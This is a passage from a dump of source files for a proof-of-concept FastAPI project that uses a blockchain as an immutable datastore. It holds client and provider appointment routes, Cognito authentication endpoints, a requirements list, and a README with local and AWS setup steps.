"9b74de940ec224e45d3d5ef96bf9c37854741b1c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 452, "license_type": "permissive", "max_line_length": 54, "num_lines": 20, "path": "/example/app/api/client_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from typing import 
List\nfrom datetime import datetime\nfrom pydantic import BaseModel, EmailStr\nfrom .common_models import Address, Name, PhoneNumbers\n\n\nclass LinkedProvider(BaseModel):\n providerId: str\n providerName: str\n hasAccess: bool\n\n\nclass Client(BaseModel):\n clientId: str\n name: Name\n phoneNumbers: PhoneNumbers\n address: Address\n dateOfBirth: datetime\n email: EmailStr\n linkedProviders: List[LinkedProvider] = []\n" }, { "alpha_fraction": 0.7122940421104431, "alphanum_fraction": 0.7275031805038452, "avg_line_length": 34.8636360168457, "blob_id": "29d714560a43cf0e6c1fc96d6863c416ebcc8f0a", "content_id": "82857b102e53c58548e77fb480f8aafe57feaad0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 789, "license_type": "permissive", "max_line_length": 85, "num_lines": 22, "path": "/src/blockchain/api/blockchain_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Routes that are related to the actual blockchain\"\"\"\n\nfrom fastapi import Depends, APIRouter, status\nfrom ..blockchain import Blockchain as BlockchainDb\nfrom ..models import ProposedBlock\n\napi = APIRouter(\n prefix=\"/api/blockchain\",\n tags=[\"blockchain\"],\n dependencies=[Depends(BlockchainDb)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected](\"/health\")\ndef get_client(database: BlockchainDb = Depends()):\n \"\"\"Endpoint to validate the blockchain as a whole\"\"\"\n return 200 if database.validate() else 400\n\[email protected](\"/validate-block\", status_code=status.HTTP_200_OK)\ndef update_client(proposed_block: ProposedBlock, database: BlockchainDb = Depends()):\n \"\"\"Endpoint to validate a single block\"\"\"\n return database.get_proposed_block_hash(proposed_block)\n" }, { "alpha_fraction": 0.4611923396587372, "alphanum_fraction": 0.6884139776229858, "avg_line_length": 15.163636207580566, "blob_id": "5c9c47f865e2ef0d0e724d847efcb35ca33134af", "content_id": "019da0293d7c869cb1c300af9a99f88725beac12", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 889, "license_type": "permissive", "max_line_length": 26, "num_lines": 55, "path": "/example/app/requirements.txt", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "aniso8601==8.0.0\nastroid==2.4.2\nattrs==20.3.0\nboto3==1.17.2\nbotocore==1.20.2\ncertifi==2020.12.5\ncffi==1.14.4\nchardet==4.0.0\nclick==7.1.2\ncryptography==3.3.1\ndnspython==2.1.0\necdsa==0.14.1\nemail-validator==1.1.2\nenvs==1.3\nfastapi==0.63.0\nh11==0.12.0\nhttptools==0.1.1\nidna==2.10\ninjector==0.18.4\ninstall==1.3.4\nisort==5.6.4\nitsdangerous==1.1.0\nJinja2==2.11.2\njmespath==0.10.0\njsonschema==3.2.0\nlazy-object-proxy==1.4.3\nMarkupSafe==1.1.1\nmccabe==0.6.1\npyasn1==0.4.8\npycognito==0.1.5\npycparser==2.20\npydantic==1.7.3\npylint==2.6.0\npymongo==3.11.2\npyrsistent==0.17.3\npython-dateutil==2.8.1\npython-dotenv==0.15.0\npython-jose==3.2.0\npytz==2020.4\nPyYAML==5.4.1\nrequests==2.25.1\nrsa==4.7\ns3transfer==0.3.4\nsix==1.15.0\nstarlette==0.13.6\ntoml==0.10.2\ntyping-extensions==3.7.4.3\nurllib3==1.26.3\nuvicorn==0.13.3\nuvloop==0.14.0\nuWSGI==2.0.19.1\nwatchgod==0.6\nwebsockets==8.1\nWerkzeug==1.0.1\nwrapt==1.12.1\n" }, { "alpha_fraction": 0.6517792344093323, "alphanum_fraction": 0.6604030728340149, "avg_line_length": 41.53281784057617, "blob_id": "156ae5d650313faaacca16913bb9e340a53ea410", "content_id": "25ce4b5b2882b38bef6f9aa604e668a080122e34", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11016, "license_type": "permissive", "max_line_length": 109, "num_lines": 259, "path": "/example/app/api/provider_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Routes for provider api\"\"\"\nimport uuid\nfrom typing import Optional\nfrom fastapi import Depends, APIRouter, status\nfrom fastapi.exceptions import HTTPException\nfrom .provider_models import Provider, ProviderSearchResult\nfrom .common_models import Appointment, Provinces, ProvidableTreatment, AppointmentStatus, Address\nfrom .blockchain import BlockchainDb\nfrom .util import verify_auth_header\nfrom .client_models import Client, LinkedProvider\n\napi = APIRouter(\n prefix=\"/api/provider\",\n tags=[\"providers\"],\n dependencies=[Depends(BlockchainDb),Depends(verify_auth_header)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected](\"/{provider_id}\", response_model=Provider, status_code=status.HTTP_200_OK)\ndef get_provider(provider_id: str, database: BlockchainDb = Depends()):\n \"\"\"Returns a single provider\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n return Provider(**result)\n\[email protected](\"/{provider_id}\", status_code=status.HTTP_200_OK)\ndef update_provider(provider_id: str, provider: Provider, database: BlockchainDb = Depends()):\n \"\"\"Updates a provider\"\"\"\n if provider.providerId != provider_id:\n raise HTTPException(status_code=400,\n detail='Provider id in query parameter doesn\\'t match payload')\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/providable-treatments\", status_code=status.HTTP_200_OK)\ndef get_provider_providable_treatments(provider_id: str, database: BlockchainDb = Depends()):\n \"\"\"Gets the treatments a provider can provide to a client\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n return Provider(**result).providableTreatments\n\[email protected](\"/{provider_id}/providable-treatments\", status_code=status.HTTP_200_OK)\ndef add_provider_providable_treatment(provider_id: str, providableTreatment: ProvidableTreatment,\n database: BlockchainDb = Depends()):\n \"\"\"Adds a treatments that a provider can provide to a client\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n\n for existing_providable_treatment in provider.providableTreatments:\n if existing_providable_treatment.name.lower() == providableTreatment.name.lower():\n raise HTTPException(status_code=400,\n detail=f'Providable treatment: \\\n {providableTreatment.name} already exists')\n\n providableTreatment.providableTreatmentId = str(uuid.uuid4())\n provider.providableTreatments.append(providableTreatment)\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/address\", status_code=status.HTTP_200_OK)\ndef add_provider_address(provider_id: str, address: Address,\n database: BlockchainDb = Depends()):\n \"\"\"\n Adds provider address\n \"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n 
raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n address.addressId = str(uuid.uuid4())\n provider.addresses.append(address)\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/providable-treatments/{providable_treatment_id}\", status_code=status.HTTP_200_OK)\ndef delete_provider_providable_treatment(provider_id: str,\n providable_treatment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Adds a treatments that a provider can provide to a client\"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n\n providable_treatments = []\n\n for existing_providable_treatment in provider.providableTreatments:\n if existing_providable_treatment.providableTreatmentId != providable_treatment_id:\n providable_treatments.append(existing_providable_treatment)\n\n provider.providableTreatments = providable_treatments\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/address/{address_id}\", status_code=status.HTTP_200_OK)\ndef delete_provider_address(provider_id: str,\n address_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"\n Removes an address from a provider\n \"\"\"\n result = database.find_one('Provider', {'providerId': provider_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Provider not found')\n\n provider = Provider(**result)\n\n addresses = []\n\n for existing_address in provider.addresses:\n if existing_address.addressId != address_id:\n addresses.append(existing_address)\n\n provider.addresses = addresses\n\n database.commit_transaction(provider, 'EDIT', 'Provider', 'providerId', provider_id)\n\[email protected](\"/{provider_id}/appointments\", status_code=status.HTTP_200_OK)\ndef get_provider_appointments(provider_id: str, database: BlockchainDb = Depends()):\n \"\"\"Gets appointments that are assigned to a provider\"\"\"\n result = database.find('Appointment', {'providerId': provider_id})\n\n if result is None:\n return {}\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}\", status_code=status.HTTP_200_OK)\ndef get_provider_appointment(provider_id: str, appointment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Gets a single appoint that is assigned to a provider\"\"\"\n result = database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}/accept\", status_code=status.HTTP_200_OK)\ndef accept_provider_appointment(provider_id: str,\n appointment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Accepts an appointment that is assigned to a provider\"\"\"\n appointment = database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id})\n\n if appointment is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n \n updated_appointment = Appointment(**appointment)\n\n updated_appointment.status = AppointmentStatus.Accepted\n\n #need to add protect so that only 1 create block can exist for a given ID\n result = database.commit_transaction(updated_appointment, 'EDIT',\n 'Appointment', 'appointmentId', 
appointment_id)\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}/reject\", status_code=status.HTTP_200_OK)\ndef reject_provider_appointment(provider_id: str,\n appointment_id: str,\n database: BlockchainDb = Depends()):\n \"\"\"Rejects an appointment that is assigned to a provider\"\"\"\n appointment = database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id})\n\n if appointment is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n updated_appointment = Appointment(**appointment)\n\n updated_appointment.status = AppointmentStatus.Rejected\n\n #need to add protect so that only 1 create block can exist for a given ID\n result = database.commit_transaction(updated_appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n return result\n\[email protected](\"/{provider_id}/appointments/{appointment_id}\", status_code=status.HTTP_200_OK)\ndef update_provider_appointment(provider_id: str,\n appointment_id: str,\n appointment: Appointment,\n database: BlockchainDb = Depends()):\n if appointment.providerId != provider_id or appointment.appointmentId != appointment_id:\n raise HTTPException(status_code=400,\n detail='Provider id in query parameter doesn\\'t match payload')\n\n existing_appointment = Appointment(**database.find_one('Appointment',\n {'providerId': provider_id, 'appointmentId': appointment_id}))\n\n if existing_appointment.status == AppointmentStatus.Completed \\\n or existing_appointment.status == AppointmentStatus.Rejected:\n raise HTTPException(status_code=400,\n detail='Cannot update a completed or rejected appointment')\n\n #need to add protect so that only 1 create block can exist for a given ID\n result = database.commit_transaction(appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n related_client_result = database.find_one('Client', { 'clientId': appointment.clientId})\n\n if related_client_result is None:\n raise HTTPException(status_code=404, detail='Client related to appointment not found')\n\n related_client = Client(**related_client_result)\n\n if not any(linked_provider.providerId == appointment.providerId\n for linked_provider in related_client.linkedProviders):\n raise HTTPException(status_code=403)\n \n if result is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n return result\n\[email protected](\"/search/available\", status_code=status.HTTP_200_OK)\ndef search_provider(name: Optional[str]=None, city: Optional[str]=None,\n province: Optional[Provinces]=None, database: BlockchainDb = Depends()):\n \"\"\"Searches for a provider based on nothing, a name, a city or a province\"\"\"\n query = {}\n\n if name is not None:\n name_query = { \"name.firstName\": { '$regex' : f'^{name}'} }\n query = {**name_query}\n#\n if city is not None:\n city_query = { \"address.city\": { '$regex' : f'^{city}'} }\n query = {**query, **city_query}\n\n if province is not None:\n province_query = { \"address.province\": province }\n query = {**query, **province_query}\n\n raw_results = database.find('Provider', query)\n\n results = []\n\n for raw_result in raw_results:\n results.append(ProviderSearchResult(**raw_result))\n\n return results\n" }, { "alpha_fraction": 0.6555184125900269, "alphanum_fraction": 0.6615384817123413, "avg_line_length": 46.84000015258789, "blob_id": "fd7e1bfcf42c23e05b9d277901103d9596390dea", "content_id": "6ab95c82a5abe06b7f582d02e1b2547ed3ebdb5b", "detected_licenses": [ "MIT" ], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 5980, "license_type": "permissive", "max_line_length": 123, "num_lines": 125, "path": "/example/app/api/auth_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import os\nimport uuid\nfrom pycognito import Cognito\nfrom fastapi import APIRouter, Depends, status\nfrom .blockchain import BlockchainDb\nfrom .client_models import Client\nfrom .provider_models import Provider\nfrom .util import verify_auth_header\nfrom .auth_models import RegisterClient, RegisterProvider, SignIn, ConfirmSignUp, \\\n ChangePassword, ConfirmForgotPassword, ForgotPassword, Token, \\\n User, SignInResponse\n\n\napi = APIRouter(\n prefix=\"/api/auth\",\n tags=[\"authentication\"],\n dependencies=[Depends(BlockchainDb)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected]('/verify-token',\n status_code=status.HTTP_200_OK,\n dependencies=[Depends(verify_auth_header)])\ndef verify_token():\n pass\n\n\[email protected]('/register-client', response_model=str, status_code=status.HTTP_200_OK)\ndef register_client(client: RegisterClient, database: BlockchainDb = Depends()):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = client.username\n aws_cognito.set_base_attributes(email=client.username, name=f'{client.name.firstName}')\n aws_cognito.add_custom_attributes(usertype='client')\n response = aws_cognito.register(client.username, client.password)\n\n client.address.addressId = uuid.uuid4()\n\n database.commit_transaction(Client(clientId=response['UserSub'],\n name=client.name,\n phoneNumbers=client.phoneNumbers,\n address=client.address,\n dateOfBirth=client.dateOfBirth,\n email=client.email).dict(),\n 'CREATE', 'Client', 'clientId', response['UserSub'])\n return response['UserSub']\n\[email protected]('/register-provider', response_model=str, status_code=status.HTTP_200_OK)\ndef register_provider(provider: RegisterProvider, database: BlockchainDb = Depends()):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = provider.username\n aws_cognito.set_base_attributes(email=provider.username, name=f'{provider.name.firstName}')\n aws_cognito.add_custom_attributes(usertype='provider') \n response = aws_cognito.register(provider.username, provider.password)\n\n for providable_treatment in provider.providableTreatments:\n providable_treatment.providableTreatmentId = uuid.uuid4()\n\n for address in provider.addresses:\n address.addressId = uuid.uuid4()\n try:\n database.commit_transaction(Provider(providerId=response['UserSub'],\n name=provider.name,\n phoneNumbers=provider.phoneNumbers,\n addresses=provider.addresses,\n dateOfBirth=provider.dateOfBirth,\n email=provider.email,\n providableTreatments=provider.providableTreatments).dict(),\n 'CREATE', 'Provider', 'providerId', response['UserSub'])\n return response['UserSub']\n except:\n aws_cognito.delete_user()\n return status.HTTP_400_BAD_REQUEST\n\[email protected](\"/sign-in\", response_model=SignInResponse, status_code=status.HTTP_200_OK)\ndef sign_in(user_sign_in: SignIn):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n aws_cognito.username = user_sign_in.username\n aws_cognito.authenticate(password=user_sign_in.password)\n user = aws_cognito.get_user(attr_map={\"usertype\": \"custom:usertype\",\"user_id\":\"sub\"})\n usertype = user._data[\"custom:usertype\"]\n user_id = user.sub\n 
resp = {\"user\": User(userId=user_id, username=user.username, usertype=usertype), \"token\":Token(**aws_cognito.__dict__)}\n return SignInResponse(**resp)\n\[email protected](\"/confirm-registration\", status_code=status.HTTP_200_OK)\ndef confirm_registration(confirm_sign_up: ConfirmSignUp):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'], os.environ['USER_POOL_WEB_CLIENT_ID'])\n aws_cognito.confirm_sign_up(confirm_sign_up.verificationCode, username=confirm_sign_up.username)\n\[email protected](\"/sign-out\", status_code=status.HTTP_200_OK)\ndef sign_out(token: str = Depends(verify_auth_header)):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'],\n access_token=token)\n aws_cognito.logout()\n\[email protected](\"/change-password\", status_code=status.HTTP_200_OK)\ndef change_password(user_change_password: ChangePassword, token: str = Depends(verify_auth_header)):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'],\n access_token=token)\n aws_cognito.change_password(user_change_password.old_password, user_change_password.new_password)\n\[email protected](\"/forgot-password\", status_code=status.HTTP_200_OK)\ndef forgot_password(user_forgot_password: ForgotPassword):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = user_forgot_password.username\n aws_cognito.add_custom_attributes(email=user_forgot_password.username)\n\n aws_cognito.initiate_forgot_password()\n\[email protected](\"/confirm-forgot-password\", status_code=status.HTTP_200_OK)\ndef confirm_forgot_password(user_confirm_forgot_password: ConfirmForgotPassword):\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'])\n\n aws_cognito.username = user_confirm_forgot_password.username\n aws_cognito.add_custom_attributes(email=user_confirm_forgot_password.username)\n\n aws_cognito.confirm_forgot_password(user_confirm_forgot_password.verification_code,\n user_confirm_forgot_password.new_password)\n" }, { "alpha_fraction": 0.7391692996025085, "alphanum_fraction": 0.7525681257247925, "avg_line_length": 45.65277862548828, "blob_id": "87ee92783949a702719563af91017241623b6f39", "content_id": "181cddfd917bf5727682824c7f09861bdc22289d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6717, "license_type": "permissive", "max_line_length": 266, "num_lines": 144, "path": "/README.md", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "- [1. Description](#1-description)\n- [2. Required Programs](#2-required-programs)\n- [3. How it works](#3-how-it-works)\n- [4. Running Example Locally](#4-running-example-locally)\n - [4.1. Without Docker](#41-without-docker)\n - [4.2. With Docker](#42-with-docker)\n- [5. Running Example on AWS](#5-running-example-on-aws)\n- [6. Points of Improvement/Potential next steps](#6-points-of-improvementpotential-next-steps)\n- [7. Related links](#7-related-links)\n\n## 1. Description\n\nThe idea behind this project was to be a proof of concept for using a blockchain\nas a means to create an immutable datastore. 
The blockchain in this case would act\nsimilar to the transaction log in a traditional sql database except that it would \nact as a record only and not a means to rebuild the current state of the database.\n\nThe example is built using FastAPI and the blockchainDB library exposes several FastAPI endpoints that can be integrated into any other future examples.\n\n## 2. Required Programs\n\n- Docker\n- Python\n- MongoDB Compass (Optional, but makes things easier)\n- AWS CLI\n\nFor setup instructions see [related links](#7-related-links)\n\n## 3. How it works\n\nThe blockchain database works by adding an entry to the blockchain and to a specific \ndocument collection every time a transaction is committed. Each block to be committed\nrequires a single primary key field, which is used to determine whether a block with that\nsame key has been created previously: new blocks with no existing key are tagged\nas a 'CREATE' entry, and any future block as an 'EDIT' block. It will throw an\nexception if another 'CREATE' block with the same key is attempted to be committed.\nAfter a candidate block has been created, it will confer with any linked nodes to \ndetermine if there are any other commits that have completed before the current commit\nand will reject the block if the other nodes do not agree on the generated hash. If it\nsucceeds, the block will be added to the chain and the data to the respective collection and the function will return true. If not, the function will return false.\nFor each 'EDIT' operation, a flag will be set on each data collection entity with a matching key that will mark all preceding data as superceded. \n\nThis database reuses the query language used by MongoDB and allows the user of this \nlibrary to query the database based upon that syntax. There is a current limitation in that it will only return data with the superceded flag being false. If there is\ndata found for the search, each returned entity will be verified against the blockchain prior to being returned to the caller. If it fails to verify, the audit function\nwill return nothing.\n\n\n## 4. Running Example Locally\n\nThe example project can be run locally either with or without docker as described in\nthe following sections.\n\n### 4.1. Without Docker\n\n1. Navigate to the root of the example directory\n2. Set up a new python virtual environment\n ```\n python3 -m venv venv\n ```\n Activate the environment with the following command\n ```\n source venv/bin/activate\n ``` \n3. Install dependencies from the requirements file\n ```\n pip3 install -r app/requirements.txt\n ```\n4. Start the FastAPI development server \n\n ```\n export DATABASE='blockmedi' CONNECTION_STRING='mongodb connection string' NODES=['node ip addresses'] USER_POOL_ID='Cognito user pool ID' USER_POOL_WEB_CLIENT_ID='Cognito user pool web client id'\n\n uvicorn app.main:app --reload\n ```\n5. View swagger page to check that server has started at the following url\n ```\n http://127.0.0.1:8000/docs\n ```\n\n### 4.2. With Docker\n\nUsing docker compose makes this process easier, as the docker compose file provided\nwith the example contains an image for a mongodb instance. The docker-compose configuration is slightly different from that of the environment when hosted on AWS as it uses an HA proxy instance as the load balancer instead of the AWS ALB. \n\n1. Start the docker instances\n ```\n docker-compose up --build --remove-orphans\n ```\n2. 
View swagger page to check that server has started at the following url\n ```\n https://127.0.0.1:5001/docs\n ```\n or \n ```\n https://127.0.0.1:5002/docs\n ```\n Target requests to the load balancer at\n ```\n https://127.0.0.1:5000\n ```\n\n## 5. Running Example on AWS\n\nRunning the example in AWS requires a fair number of supporting services to \nwork correctly. The AWS CLI needs to be set up for this to work properly. See the link to the AWS CLI in the [related links](#7-related-links) section for more information.\n\n1. Create base services using CloudFormation in the attached base.yml file. \n This will create Cognito, the ECS cluster, the load balancers, related certificates, and the VPC.\n ```\n aws cloudformation deploy \\\n --template-file base.yml \\\n --stack-name some-stack-name \\\n --capabilities CAPABILITY_IAM \\\n --parameter-overrides DNSName=testdomain\n ```\n2. Commit the code in the example to a repository of your choosing. This is to be able to build and deploy a task definition to the ECS cluster. It is easiest to use GitHub for this as it's free and is easily integrated with CodePipeline.\n3. Create the pipeline with CloudFormation\n ```\n aws cloudformation deploy \\\n --template-file appconfig.yml \\\n --capabilities CAPABILITY_IAM \n ```\n The above command will need to have the parameter overrides added as per what is \n in the appconfig.yml file. The secrets for GitHub and the mongodb store will\n need to be created manually in AWS.\n4. Add an A record in Route 53 to link your domain in AWS to the ALB. The hosted zone will need to be created before you can add a record. This would either need to be a new domain created or one transferred from another registrar.\n\n## 6. Points of Improvement/Potential next steps\n\n- Change to be agnostic of backing database. This could be a plugin based system or have a backing database built in.\n- The base library needs unit and integration tests added. Could be useful to have it set up in the pipeline or done as part of github/bitbucket/azure devops pipeline.\n- The means of voting is dependent on services from AWS; this would be better if it were independent of services provided by AWS.\n- There is a threading problem with using FastAPI and Python for this type of project. Would be better to either resolve it or move away from Python. Would also be better to not be quite so dependent on FastAPI; could be good to use protobuf as a potential alternative.\n\n\n## 7. 
Related links\n\n- https://aws.amazon.com/cli/\n- https://www.docker.com/get-started\n- https://fastapi.tiangolo.com/\n- https://www.mongodb.com/cloud/atlas\n- https://www.python.org/downloads/\n- https://pydantic-docs.helpmanual.io/" }, { "alpha_fraction": 0.6595744490623474, "alphanum_fraction": 0.6761229038238525, "avg_line_length": 23.941177368164062, "blob_id": "2db0955ad7200dee47b4e58722d645c416d4d889", "content_id": "009e5552ee4063b2b96acae7848b8ca14c5b5e5f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 423, "license_type": "permissive", "max_line_length": 58, "num_lines": 17, "path": "/example/test/aws_service_discovery/service_discovery.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import boto3\nimport json\n\nclient = boto3.client('servicediscovery')\n\nservices = client.list_services()\n\nfor service in services['Services']:\n print(service)\n instances = client.list_instances(\n ServiceId=service['Id'],\n MaxResults=100\n )\n\n for instance in instances['Instances']:\n print(instance['Attributes']['AWS_INSTANCE_IPV4'])\n print(instance['Attributes']['AWS_INSTANCE_IPV4'])" }, { "alpha_fraction": 0.6562778353691101, "alphanum_fraction": 0.6651825308799744, "avg_line_length": 42.8671875, "blob_id": "d429db8d0c0432197977aac44a332253b6a384a9", "content_id": "459784e7d83034f035339b3054713dae105c3375", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5615, "license_type": "permissive", "max_line_length": 100, "num_lines": 128, "path": "/example/app/api/client_routes.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import uuid\nfrom typing import List\nfrom fastapi import Depends, APIRouter, status, HTTPException\nfrom .client_models import Client, LinkedProvider\nfrom .provider_models import Provider\nfrom .common_models import Appointment, AppointmentStatus\nfrom .blockchain import BlockchainDb\nfrom .util import verify_auth_header\n\n\napi = APIRouter(\n prefix=\"/api/client\",\n tags=[\"clients\"],\n dependencies=[Depends(BlockchainDb),Depends(verify_auth_header)],\n responses={404: {\"description\": \"Not found\"}},\n)\n\[email protected](\"/{client_id}\", response_model=Client, status_code=status.HTTP_200_OK)\ndef get_client(client_id: str, database: BlockchainDb = Depends()):\n result = database.find_one('Client', {'clientId': client_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Client not found')\n\n return Client(**result)\n\[email protected](\"/{client_id}\", status_code=status.HTTP_200_OK)\ndef update_client(client_id: str, client: Client, database: BlockchainDb = Depends()):\n if client.clientId != client_id:\n raise HTTPException(status_code=400,\n detail='Client id in query parameter doesn\\'t match payload')\n\n database.commit_transaction(client, 'EDIT', 'Client', 'clientId', client_id)\n\[email protected](\"/{client_id}/appointments\",\n response_model=List[Appointment],\n status_code=status.HTTP_200_OK)\ndef get_client_appointments(client_id: str, database: BlockchainDb = Depends()):\n result = database.find('Appointment', {'clientId': client_id})\n\n if result is None:\n return []\n\n return result\n\[email protected](\"/{client_id}/appointments/{appointment_id}\",\n response_model=Appointment,\n status_code=status.HTTP_200_OK)\ndef get_client_appointment(client_id: str, appointment_id: str, database: BlockchainDb = Depends()):\n result = 
database.find_one('Appointment',\n {'clientId': client_id, 'appointmentId': appointment_id})\n\n if result is None:\n raise HTTPException(status_code=404, detail='Appointment not found')\n\n return result\n\[email protected](\"/{client_id}/appointments\", status_code=status.HTTP_200_OK)\ndef add_client_appointment(client_id: str, appointment: Appointment,\n database: BlockchainDb = Depends()):\n if appointment.clientId != client_id:\n raise HTTPException(status_code=400,\n detail=f'Client id ({client_id}) in query \\\n parameter doesn\\'t match payload \\\n ({appointment.clientId}) \\\n {client_id == appointment.clientId}')\n #need to add protect so that only 1 create block can exist for a given ID\n appointment.appointmentId = str(uuid.uuid4())\n\n provider = Provider(**database.find_one('Provider', {'providerId': appointment.providerId}))\n client = Client(**database.find_one('Client', {'clientId': client_id}))\n\n if not any(linked_provider.providerId == provider.providerId\n for linked_provider in client.linkedProviders):\n client.linkedProviders.append(LinkedProvider(providerId=provider.providerId, \n hasAccess=True,\n providerName=f'{provider.name.firstName} {provider.name.lastName}'))\n\n database.commit_transaction(client, 'EDIT', 'Client', 'clientId', client_id)\n\n database.commit_transaction(appointment, 'CREATE', 'Appointment',\n 'appointmentId', appointment.appointmentId)\n\[email protected](\"/{client_id}/linked-provider/{provider_id}/toggle\", status_code=status.HTTP_200_OK)\ndef toggle_client_linked_provider(client_id: str, provider_id: str,\n database: BlockchainDb = Depends()):\n\n client = Client(**database.find_one('Client', {'clientId': client_id}))\n\n for index, linked_provider in enumerate(client.linkedProviders):\n if linked_provider.providerId == provider_id:\n linked_provider.hasAccess = not linked_provider.hasAccess\n client.linkedProviders[index] = linked_provider\n\n database.commit_transaction(client, 'EDIT', 'Client', 'clientId', client_id)\n\[email protected](\"/{client_id}/appointments/{appointment_id}\", status_code=status.HTTP_200_OK)\ndef update_client_appointment(client_id: str, appointment_id: str,\n appointment: Appointment, database: BlockchainDb = Depends()):\n if appointment.clientId != client_id or appointment.appointmentId != appointment_id:\n raise HTTPException(status_code=400,\n detail='Client id in query parameter doesn\\'t match payload')\n\n if appointment.status == AppointmentStatus.Completed \\\n or appointment.status == AppointmentStatus.Rejected:\n raise HTTPException(status_code=400,\n detail='Cannot update a completed or rejected appointment')\n\n result = database.commit_transaction(appointment, 'EDIT',\n 'Appointment', 'appointmentId', appointment_id)\n\n if result is None:\n raise HTTPException(status_code=400, detail='Could not update appointment')\n\n return result\n\[email protected](\"/{client_id}/prescribed-treatments\", status_code=status.HTTP_200_OK)\ndef get_client_prescribed_treatments(client_id: str, database: BlockchainDb = Depends()):\n appointments = database.find('Appointment', { 'clientId' : client_id})\n\n if appointments is None:\n return []\n \n prescribed_treatments = []\n\n [prescribed_treatments.extend(appointment.prescribedTreatment) for appointment in appointments]\n\n return prescribed_treatments\n" }, { "alpha_fraction": 0.66150963306427, "alphanum_fraction": 0.6704172492027283, "avg_line_length": 21.935483932495117, "blob_id": "91cb53d7a010549902f8577071c78fd6340fc4dc", "content_id": 
